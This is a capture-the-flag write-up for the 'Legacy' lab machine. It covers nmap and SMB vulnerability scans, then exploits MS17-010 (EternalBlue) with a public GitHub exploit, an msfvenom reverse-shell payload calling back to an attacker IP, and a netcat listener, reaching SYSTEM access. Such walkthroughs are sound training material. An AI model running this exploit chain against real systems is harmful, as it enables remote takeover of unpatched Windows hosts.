Legacy Writeup

Without Metasploit

Reconnaissance

Initial Nmap Scan to find open ports, using treat all hosts as online (-Pn)

nmap -Pn 10.10.10.4

Detailed Nmap Scan :‌

Command Breakdown:‌

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 139,445,3389

  • (-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 139,445,3389 -oN nmap 10.10.10.4

Enumeration

SMB is a command service with vulnerabilities, lets use a nmap script specific to smb to find vulnerabilities.

nmap --script smb-vuln* -p 139,445 10.10.10.4

We can see that it is vulnerable to CVE-2008-4250 (MS08-067) and CVE-2017-0143 (ms17-010) , two commonly known vulnerabilities

Exploitation

The vulnerability that we will be exploiting is called Eternal Blue, a vulnerability that exploits Microsoft's implementation of Server Message Block (SMB) protocol. If an attacker sends a payload, the attacker would be allowed to execute arbitrary code on the target machine.

There is a great article explaining this vulnerability and how to exploit it.

First let us download the exploit from GitHub

git clone https://github.com/helviojunior/MS17-010.git

Now we have to use MSF Venom to create a reverse shell payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f exe > exploit.exe

Now lets start a listener on our machine

nc -lvnp 1234

Lets run the exploit

python send_and_execute.py 10.10.10.4 exploit.exe

And we have a reverse shell

Now if we try using the whoami command to find what privileges we have on the system, it does not work, so I just went looking for both the flags, and found out that I can read both of them which means we are NT AUTHORITY\SYSTEM.

Last updated